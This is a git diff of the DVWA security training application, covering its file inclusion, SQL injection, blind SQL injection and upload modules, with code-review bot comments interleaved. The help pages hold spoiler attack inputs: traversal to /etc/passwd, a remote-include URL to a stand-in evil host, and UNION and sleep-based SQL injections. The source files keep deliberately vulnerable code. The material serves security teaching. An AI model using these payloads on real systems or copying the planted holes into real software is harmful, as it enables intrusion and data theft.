    - -"; +\n"; ?> diff --git a/vulnerabilities/fi/file2.php b/vulnerabilities/fi/file2.php index 696417f13..cfa47abb0 100644 --- a/vulnerabilities/fi/file2.php +++ b/vulnerabilities/fi/file2.php @@ -11,10 +11,9 @@

    More info

    - -"; +\n"; ?> diff --git a/vulnerabilities/fi/file3.php b/vulnerabilities/fi/file3.php index 2caaf178a..401bcb68a 100644 --- a/vulnerabilities/fi/file3.php +++ b/vulnerabilities/fi/file3.php @@ -6,14 +6,14 @@

    File 3


    - Welcome back ".dvwaCurrentUser()."
    + Welcome back " . dvwaCurrentUser() . "
    Your IP address is: "; if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) $page[ 'body' ] .= $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; else $page[ 'body' ] .= "**Missing Header**"; $page[ 'body' ] .= "
    - Your user-agent address is: ".$_SERVER[ 'HTTP_USER_AGENT' ]."
    + Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
    You came form: {$_SERVER[ 'HTTP_REFERER' ]}
    I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}

    [back] @@ -21,10 +21,9 @@
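Review bot: `{$_SERVER[ 'HTTP_REFERER' ]}` and `{$_SERVER[ 'HTTP_USER_AGENT' ]}` are interpolated without the `array_key_exists` guard this same hunk applies to `HTTP_X_FORWARDED_FOR` two lines earlier, so a direct visit with no Referer header raises an undefined-index notice inside the page body. Mirroring that guard, e.g. `You came from: " . ( isset( $_SERVER[ 'HTTP_REFERER' ] ) ? $_SERVER[ 'HTTP_REFERER' ] : '**Missing Header**' ) . "`, keeps all four header lines consistent and also fixes the "came form" typo in the label. These header values are written into the page as-is; if reflecting them unencoded is not part of the exercise, they should pass through `htmlspecialchars` as well.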

    More info

    -
    -"; +\n"; ?> diff --git a/vulnerabilities/fi/file4.php b/vulnerabilities/fi/file4.php new file mode 100644 index 000000000..da7012ea2 --- /dev/null +++ b/vulnerabilities/fi/file4.php @@ -0,0 +1,14 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 4 (Hidden)

    +
    + Good job!
    + This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
    + +
    \n"; + +?> diff --git a/vulnerabilities/fi/help/help.php b/vulnerabilities/fi/help/help.php index 67973a09e..997577e1b 100644 --- a/vulnerabilities/fi/help/help.php +++ b/vulnerabilities/fi/help/help.php @@ -5,15 +5,51 @@
    +

    About

    Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. - At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing - the potential for malicious file execution.

    + At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing + the potential for malicious file execution.

    -

    Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd

    +

    If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other + machines, which then the attack is a "Remote File Inclusion (RFI).

    -

    or

    +

    When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect.

    -

    Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php

    +

    Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure".

    + +


    + +

    Objective

    +

    Read all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion.

    + +


    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will include the content when executing.

    + +

    Depending on the web service configuration will depend if RFI is a possibility.

    +
    Spoiler: LFI: ?page=../../../../../../etc/passwd.
    +			Spoiler: RFI: ?page=http://www.evilsite.com/evil.php.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough.

    +
    Spoiler: LFI: Possible, due to it only cycling through the pattern matching once.
    +			Spoiler: RFI: .
    + +
    + +

    High Level

    +

    The developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename, + they use a wildcard to include them all.

    +
    Spoiler: LFI: The filename only has start with a certain value..
    +			Spoiler: RFI: Need to link in another vulnerability, such as file upload.
    + +
    + +

    Impossible Level

    +

    The developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack.

    @@ -22,5 +58,6 @@
    -

    Reference: https://www.owasp.org/index.php/Top_10_2007-A3

    +

    Reference:

    + diff --git a/vulnerabilities/fi/include.php b/vulnerabilities/fi/include.php index 8f4b20cc0..45d1a4c90 100644 --- a/vulnerabilities/fi/include.php +++ b/vulnerabilities/fi/include.php @@ -1,19 +1,30 @@ The PHP function allow_url_include is not enabled."; +} +if( !ini_get( 'allow_url_fopen' ) ) { + $WarningHtml .= "
    The PHP function allow_url_fopen is not enabled.
    "; +} + + $page[ 'body' ] .= "

    Vulnerability: File Inclusion

    + {$WarningHtml} +
    [file1.php] - [file2.php] - [file3.php]

    More Information

    -
    -"; +\n"; ?> diff --git a/vulnerabilities/fi/index.php b/vulnerabilities/fi/index.php index 7f74e6db0..20a0c9102 100644 --- a/vulnerabilities/fi/index.php +++ b/vulnerabilities/fi/index.php @@ -1,12 +1,12 @@ diff --git a/vulnerabilities/fi/source/medium.php b/vulnerabilities/fi/source/medium.php index 7fd6047d6..679bc4526 100644 --- a/vulnerabilities/fi/source/medium.php +++ b/vulnerabilities/fi/source/medium.php @@ -1,6 +1,7 @@
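Review bot: The new warnings describe `allow_url_include` and `allow_url_fopen` as "The PHP function ... is not enabled", but both are php.ini directives rather than functions, and a reader looking for a function to enable will not find one; `The PHP setting allow_url_include is not enabled.` names what actually has to change. The sqli index.php hunk in this commit uses the same "PHP function" wording for Magic Quotes and safe mode. `ini_get` returns the directive as a string, so `!ini_get( 'allow_url_fopen' )` correctly treats the "0" and "" off values as disabled. The start of the hunk, including where `$WarningHtml` is initialised, is not visible in this rendering.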
    +

    About

    A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. - A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database - (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a - type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

    + A successful SQL injection exploit can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database + (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system (load_file) and in some cases issue commands to the operating system.

    -

    The 'id' variable within this PHP script is vulnerable to SQL injection.

    +

    SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

    -

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!

    +

    This attack may also be called "SQLi".

    -

    If you have received a Magicquotes error, turn them off in php.ini.

    +


    + +

    Objective

    +

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal their passwords via SQLi.

    + +


    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    +
    Spoiler: ?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    +
    Spoiler: ?id=a UNION SELECT 1,2;-- -&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

    +
    Spoiler: ID: a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    @@ -23,5 +56,5 @@
    -

    Reference: https://www.owasp.org/index.php/SQL_Injection

    +

    Reference:

    diff --git a/vulnerabilities/sqli/index.php b/vulnerabilities/sqli/index.php index a06faa8b8..5837b1b2c 100644 --- a/vulnerabilities/sqli/index.php +++ b/vulnerabilities/sqli/index.php @@ -1,18 +1,19 @@ Magic Quotes are on, you will not be able to inject SQL."; + $WarningHtml .= "
    The PHP function \"Magic Quotes\" is enabled.
    "; +} +// Is PHP function safe_mode enabled? +if( ini_get( 'safe_mode' ) == true ) { + $WarningHtml .= "
    The PHP function \"Safe mode\" is enabled.
    "; } - -$method = 'GET'; -if( $vulnerabilityFile == 'medium.php' ) - $method = 'POST'; $page[ 'body' ] .= "

    Vulnerability: SQL Injection

    - {$magicQuotesWarningHtml} + {$WarningHtml}
    "; -if( $vulnerabilityFile == 'high.php' ){ +if( $vulnerabilityFile == 'high.php' ) { $page[ 'body' ] .= "Click here to change your ID."; } else { @@ -56,7 +58,7 @@
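Review bot: The new safe-mode warning, `if( ini_get( 'safe_mode' ) == true )`, compares the string that `ini_get()` returns loosely, and `safe_mode` was removed in PHP 5.4, so on any current interpreter `ini_get()` yields `false` and the branch is dead; if it is kept for legacy installs, say so in the comment, e.g. `// safe_mode was removed in PHP 5.4; only meaningful on legacy interpreters`. The hunk's start is cut off, so I cannot see whether `$WarningHtml` is initialised to `''` before the first `.=` the way vulnerabilities/upload/index.php does in this commit; without that, an install with neither warning raises an undefined-variable notice where `{$WarningHtml}` is interpolated. The same block is added in vulnerabilities/sqli_blind/index.php.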

    User ID:"; - if( $vulnerabilityFile == 'medium.php' ){ + if( $vulnerabilityFile == 'medium.php' ) { $page[ 'body' ] .= "\n "; $page[ 'body' ] .= "\n -

    -"; +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -84,15 +85,14 @@

    More Information

      -
    • ".dvwaExternalLinkUrlGet( 'http://www.securiteam.com/securityreviews/5DP0N1P76E.html' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/SQL_Injection' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'http://bobby-tables.com/' )."
    • +
    • " . dvwaExternalLinkUrlGet( 'http://www.securiteam.com/securityreviews/5DP0N1P76E.html' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/SQL_Injection' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'http://bobby-tables.com/' ) . "
    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/sqli/session-input.php b/vulnerabilities/sqli/session-input.php index c1059d95e..f11436beb 100644 --- a/vulnerabilities/sqli/session-input.php +++ b/vulnerabilities/sqli/session-input.php @@ -1,17 +1,17 @@

    "; - $page[ 'body' ] .= "Session ID: " . $_SESSION[ 'id' ] . "


    "; + $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}


    "; $page[ 'body' ] .= ""; } diff --git a/vulnerabilities/sqli/source/high.php b/vulnerabilities/sqli/source/high.php index f8e877c5a..092c9b41c 100644 --- a/vulnerabilities/sqli/source/high.php +++ b/vulnerabilities/sqli/source/high.php @@ -1,26 +1,29 @@ Something went wrong.' ); - sleep ( rand( 0, 2 ) ); - + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
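Review bot: `Session ID: {$_SESSION[ 'id' ]}` interpolates the session value into the page body without HTML escaping. The assignment to `$_SESSION['id']` sits above the hunk and is not visible, but if it is taken from this form's POST data the value is reflected straight back, which adds an unintended reflected XSS to a helper page whose purpose is only to feed the SQLi high level. Escaping at the echo, `htmlspecialchars( $_SESSION[ 'id' ], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' )`, keeps the SQLi exercise unchanged because the session value itself is untouched.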
    ";
    -		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}"; - $html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli/source/impossible.php b/vulnerabilities/sqli/source/impossible.php index 70486fbdf..41e57c10c 100644 --- a/vulnerabilities/sqli/source/impossible.php +++ b/vulnerabilities/sqli/source/impossible.php @@ -4,18 +4,25 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Retrieve data + // Get input $id = $_GET[ 'id' ]; + // Was a number entered? if(is_numeric( $id )) { - $data = $db->query( 'SELECT first_name, last_name FROM users WHERE user_id = ' . $db->quote( $id ) ); - foreach( $data as $i ) { - $first = $i[ 'first_name' ]; - $last = $i[ 'last_name' ]; + // Check the database + $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + $row = $data->fetch(); - $html .= "
    ";
    -			$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}"; - $html .= "
    "; + // Make sure only 1 result is returned + if( $data->rowCount() == 1 ) { + // Get values + $first = $row[ 'first_name' ]; + $last = $row[ 'last_name' ]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; } } } diff --git a/vulnerabilities/sqli/source/low.php b/vulnerabilities/sqli/source/low.php index 2fb6eeccf..4094cec27 100644 --- a/vulnerabilities/sqli/source/low.php +++ b/vulnerabilities/sqli/source/low.php @@ -1,24 +1,29 @@ ' . mysql_error() . '' ); + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
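Review bot: `if( $data->rowCount() == 1 )` relies on `PDOStatement::rowCount()` for a SELECT, which PDO documents as not guaranteed for every driver; the row has already been fetched into `$row` on the line above, so `if( $row !== false )` (with the `LIMIT 1` keeping it to a single row) is the portable check. `$id` is bound with `PDO::PARAM_INT` after only an `is_numeric()` test, which also accepts strings such as `'1.5'` or `'1e2'`; validating with `filter_var( $id, FILTER_VALIDATE_INT )` would make the value match the bound type. The same `rowCount()` check is introduced in vulnerabilities/sqli_blind/source/impossible.php.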
    ";
    -		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}"; - $html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli/source/medium.php b/vulnerabilities/sqli/source/medium.php index 790b076b0..2ef9eef9c 100644 --- a/vulnerabilities/sqli/source/medium.php +++ b/vulnerabilities/sqli/source/medium.php @@ -1,25 +1,30 @@ ' . mysql_error() . '' ); + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Display values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
    ";
    -		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}"; - $html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + //mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/cookie-input.php b/vulnerabilities/sqli_blind/cookie-input.php index ce55a8828..5e31aa2bf 100644 --- a/vulnerabilities/sqli_blind/cookie-input.php +++ b/vulnerabilities/sqli_blind/cookie-input.php @@ -1,12 +1,12 @@
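Review bot: `//mysql_close();` is added commented out here while low.php and high.php get a live `mysql_close()`, and nothing records why the medium level is different. The index page for the medium level appears to run a further `SELECT COUNT(*) FROM users` on the same connection after this file is included (visible in the vulnerabilities/sqli_blind/index.php hunk), which would explain keeping the connection open; a comment such as `// Connection is left open: index.php still queries it to build the dropdown` would stop the next maintainer from "fixing" the inconsistency. The same commented-out call appears in vulnerabilities/sqli_blind/source/medium.php.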
    -

    When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. - Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, - they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data - by asking a series of True and False questions through SQL statements.

    +

    About

    +

    When an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. + Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, + they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. + An attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response + (valid entry retunred or 404 header set).

    -

    The 'id' variable within this PHP script is vulnerable to SQL injection.

    +

    "time based" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack). + This means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful.

    -

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!

    +


    -

    If you have received a Magicquotes error, turn them off in php.ini.

    +

    Objective

    +

    Find the version of the SQL database software through a blind SQL attack.

    + +


    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    +
    Spoiler: ?id=1' AND sleep 5&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    +
    Spoiler: ?id=1 AND sleep 3&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being set on a different page, rather than a GET request.

    +
    Spoiler: ID: 1' AND sleep 10&Submit=Submit.
    +			Spoiler: Should be able to cut out the middle man..
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    @@ -23,5 +58,5 @@
    -

    Reference: https://www.owasp.org/index.php/Blind_SQL_Injection

    +

    Reference:

    diff --git a/vulnerabilities/sqli_blind/index.php b/vulnerabilities/sqli_blind/index.php index 489d348eb..ad5dff98a 100644 --- a/vulnerabilities/sqli_blind/index.php +++ b/vulnerabilities/sqli_blind/index.php @@ -1,18 +1,19 @@ Magic Quotes are on, you will not be able to inject SQL."; + $WarningHtml .= "
    The PHP function \"Magic Quotes\" is enabled.
    "; +} +// Is PHP function safe_mode enabled? +if( ini_get( 'safe_mode' ) == true ) { + $WarningHtml .= "
    The PHP function \"Safe mode\" is enabled.
    "; } - -$method = 'GET'; -if( $vulnerabilityFile == 'medium.php' ) - $method = 'POST'; $page[ 'body' ] .= "

    Vulnerability: SQL Injection (Blind)

    - {$magicQuotesWarningHtml} + {$WarningHtml}
    "; -if( $vulnerabilityFile == 'high.php' ){ +if( $vulnerabilityFile == 'high.php' ) { $page[ 'body' ] .= "Click here to change your ID."; } else { @@ -56,8 +58,8 @@

    User ID:"; - if( $vulnerabilityFile == 'medium.php' ){ - $page[ 'body' ] .= " "; $query = "SELECT COUNT(*) FROM users;"; $result = mysql_query( $query ) or die( '

    ' . mysql_error() . '
    ' ); $num = mysql_result( $result, 0 ); @@ -66,11 +68,10 @@ $page[ 'body' ] .= ""; } else - $page[ 'body' ] .= " "; + $page[ 'body' ] .= "\n "; - $page[ 'body' ] .= " -

    " -; + $page[ 'body' ] .= "\n +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -84,15 +85,14 @@

    More Information

    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/sqli_blind/source/high.php b/vulnerabilities/sqli_blind/source/high.php index 41f0ad97c..ce2590107 100644 --- a/vulnerabilities/sqli_blind/source/high.php +++ b/vulnerabilities/sqli_blind/source/high.php @@ -1,23 +1,33 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { + // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); - header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); } + + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/source/impossible.php b/vulnerabilities/sqli_blind/source/impossible.php index 2e7fe7888..25cb7cf31 100644 --- a/vulnerabilities/sqli_blind/source/impossible.php +++ b/vulnerabilities/sqli_blind/source/impossible.php @@ -4,16 +4,26 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Retrieve data + // Get input $id = $_GET[ 'id' ]; + // Was a number entered? if(is_numeric( $id )) { - $data = $db->query( 'SELECT first_name, last_name FROM users WHERE user_id = ' . $db->quote( $id ) ); - if( count( $data->fetchAll() ) > 0 ) { + // Check the database + $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + + // Get results + if( $data->rowCount() == 1 ) { + // Feedback for end user $html .= '
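Review bot: `// Might sleep a random amount` describes what the `rand( 0, 5 ) == 3` block does but not why it exists, and the 404 header is now sent on every not-found response rather than only inside that block, so the two changes read as unrelated. If the intent is to add timing jitter to the not-found path so the level cannot be solved from response time alone, the comment should say so, e.g. `// Add random delay to the not-found path so timing alone is not a reliable signal`; otherwise a later cleanup is likely to remove what looks like a stray delay. The enclosing `if` begins above the hunk and is not visible.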
    User ID exists in the database.
    '; } else { + // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } } diff --git a/vulnerabilities/sqli_blind/source/low.php b/vulnerabilities/sqli_blind/source/low.php index 38071b90f..b73eecc39 100644 --- a/vulnerabilities/sqli_blind/source/low.php +++ b/vulnerabilities/sqli_blind/source/low.php @@ -1,20 +1,28 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { + // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/source/medium.php b/vulnerabilities/sqli_blind/source/medium.php index b327d78a9..9d77fa683 100644 --- a/vulnerabilities/sqli_blind/source/medium.php +++ b/vulnerabilities/sqli_blind/source/medium.php @@ -1,21 +1,26 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { - // header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + //mysql_close(); } ?> diff --git a/vulnerabilities/upload/help/help.php b/vulnerabilities/upload/help/help.php index 588e563a0..c4aee9884 100644 --- a/vulnerabilities/upload/help/help.php +++ b/vulnerabilities/upload/help/help.php @@ -5,13 +5,42 @@
    -

    Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. - Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

    +

    About

    +

    Uploaded files represent a significant risk to web applications. The first step in many attacks is to get some code to the system to be attacked. + Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

    The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, - and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

    + and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

    -

    Another thing worth looking for are restrictions within 'hidden' form fields.

    +


    + +

    Objective

    +

    Execute any PHP function of your choosing on the target system (such as + or ) thanks to this file upload vulnerability.

    + +


    + +

    Low Level

    +

    Low level will not check the contents of the file being uploaded in any way. It relies only on trust.

    +
    Spoiler: Upload any valid PHP file with command in it.
    + +
    + +

    Medium Level

    +

    When using the medium level, it will check the reported file type from the client when its being uploaded.

    +
    Spoiler: Worth looking for any restrictions within any "hidden" form fields.
    + +
    + +

    High Level

    +

    Once the file has been received from the client, the server will try to resize any image that was included in the request.

    +
    Spoiler: need to link in another vulnerability, such as file includion.
    + +
    + +

    Impossible Level

    +

    This will check everything from all the levels so far, as well then to re-encode the image. This will make a new image, therefor stripping + any "non-image" code (including metadata).

    @@ -20,6 +49,6 @@
    -

    Reference: https://www.owasp.org/index.php/Unrestricted_File_Upload

    +

    Reference:

    diff --git a/vulnerabilities/upload/index.php b/vulnerabilities/upload/index.php index c6ab46431..442a7b04c 100644 --- a/vulnerabilities/upload/index.php +++ b/vulnerabilities/upload/index.php @@ -1,12 +1,12 @@ Incorrect folder permissions: " . realpath( dirname( dirname( getcwd() ) ) )."/hackable/uploads/" . ""; +$WarningHtml = ''; +if( is_writable( realpath( dirname( dirname( getcwd() ) ) ) . "/hackable/uploads/" ) == false ) { + $WarningHtml .= "
    Incorrect folder permissions: " . realpath( dirname( dirname( getcwd() ) ) ) . "/hackable/uploads/" . "
    Folder is not writable.
    "; +} +// Is PHP-GD installed? +if( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) { + $WarningHtml .= "
    The PHP module PHP-GD is not installed.
    "; } $page[ 'body' ] .= "

    Vulnerability: File Upload

    - {$writableFolderWarningHtml} + {$WarningHtml}
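Review bot: `is_writable( realpath( dirname( dirname( getcwd() ) ) ) . "/hackable/uploads/" ) == false` does not handle `realpath()` returning `false`: the concatenation then yields the absolute path `/hackable/uploads/`, so the check tests the wrong directory and the warning prints a misleading location. Resolve the directory once into a local, bail out with a clear message when it is `false`, and test it with `!is_writable( $uploadDir )` rather than `== false`; the same expression is evaluated twice (check and message), which the local also removes. The message continues to print the server's absolute path into the page, matching the previous wording, so that is unchanged by this commit.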
    @@ -49,8 +53,7 @@ Choose an image to upload:



    - -"; + \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -62,13 +65,12 @@

    More Information

    "; - dvwaHtmlEcho( $page ); ?> diff --git a/vulnerabilities/upload/source/high.php b/vulnerabilities/upload/source/high.php index 5330280fa..65376a33a 100644 --- a/vulnerabilities/upload/source/high.php +++ b/vulnerabilities/upload/source/high.php @@ -1,29 +1,35 @@ '; + // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { - if(!move_uploaded_file( $uploaded_tmp, $target_path )) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { + // No + $html .= '
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } } else { - $html .= 'Your image was not uploaded. We only accept JPEG or PNG images.'; + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; } - $html .= ''; } ?> diff --git a/vulnerabilities/upload/source/impossible.php b/vulnerabilities/upload/source/impossible.php index 0b622d904..bea20378c 100644 --- a/vulnerabilities/upload/source/impossible.php +++ b/vulnerabilities/upload/source/impossible.php @@ -4,51 +4,56 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); + + // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; + + // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; - $html .= '
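Review bot: `"{$target_path} succesfully uploaded!"` writes the destination path into the page unescaped; `$target_path` is built above the hunk (not visible) and, if it embeds the client-supplied filename as the low and medium levels appear to, the upload response reflects user-controlled text into HTML. The intended weakness of this level is the extension and `getimagesize()` check, so escaping the feedback with `htmlspecialchars( $target_path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' )` does not affect the exercise. The same message is emitted in vulnerabilities/upload/source/low.php and medium.php, and "succesfully" is misspelled in all of them.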
    ';
    +	// Is it an image?
